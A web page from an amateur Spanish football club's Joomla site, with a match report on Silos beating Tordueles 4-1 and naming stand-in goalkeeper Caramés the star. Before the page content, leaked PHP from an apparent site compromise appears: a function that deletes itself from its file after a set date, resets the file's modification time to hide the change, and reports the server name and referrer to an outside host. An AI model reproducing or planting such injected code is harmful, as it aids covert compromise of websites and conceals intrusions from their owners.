check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456731446){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=5&id=18776729&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_contact/models/content.php"); } Caramés MVP

La Afición

Calendario

<<  Agosto 2017  >>
 Lu  Ma  Mi  Ju  Vi  Sa  Do 
   1  2  3  4  5  6
  7  8  910111213
14151617181920
21222324252627
28293031   
Banner
Banner
Banner
Banner

Acceso Privado Equipo



Caramés MVP PDF Imprimir E-mail
Lunes, 17 de Noviembre de 2014 14:20

Mala tarde de sábado y Silos se enfrentaba al difícil equipo de Tordueles para ver quién se quedaba con el liderato del grupo.

Silos partía de inicio con Caramés bajo palos en sustitución de Adrián, defensa de cuatro formada por Marcos, Juanma, Diego y Javi, el medio sería para Sancho, Jairo y Mario, quedando arriba Alvar, Cule y Carli.

Empezó el partido y a los pocos minutos se le puso todo de cara al equipo local, disparo lejano de Marcos que toca en un defensa y supera por arriba al portero visitante. Silos siguió a lo suyo y a los pocos minutos una falta en la frontal la convierte Sancho en el 2 a 0. Tras esto Tordueles empezó un poco a apretar y en un córner el 9 visitante remata a la escuadra recortando distancias. Silos siguió concentrado, y nuevamente a balón parado tras una cesión, Alvar de potente disparo ponía el 3 a 1. Tras esto Tordueles volvió a apretar pero es cuando surgió la figura de Caramés, fuerte disparo del equipo rival muy ajustado al palo y Carames saca una mano imposible. Así se llegó al descanso.

La segunda mitad más de lo mismo, Tordueles empezó con un tiro al larguero pero Silos dominaba el partido. en una falta peligrosa lanzada por Tordueles  que desvía la barrera,Caramés vuelve a efectuar una estirada espectacular. Entraron al campo Vicen y Diego, Silos dominaba y disponía de ocasiones para cerrar el partido pero el portero visitante respondía con buenas paradas. En los últimos minutos disparo lejano de Tordueles que Caramés envía bien a córner,  y contra Silense que de buena jugada termina con el 4 a 1 definitivo marcado por Alvar.

Partido serio de Silos en el que surgió la figura de Caramés bajo palos, siendo éste jugador de campo.

Próximo día partido difícil contra Quintana la del Agua al que Silos llega en buena forma. DEPORTIVOOOOOO.

 

Escribir un comentario

Código de seguridad
Refescar

Banner
Banner

Colaboradores

Banner
Banner
Banner
Banner
Banner
Banner



By vicencid. Potenciado por Jommla!. Valid XHTML and CSS.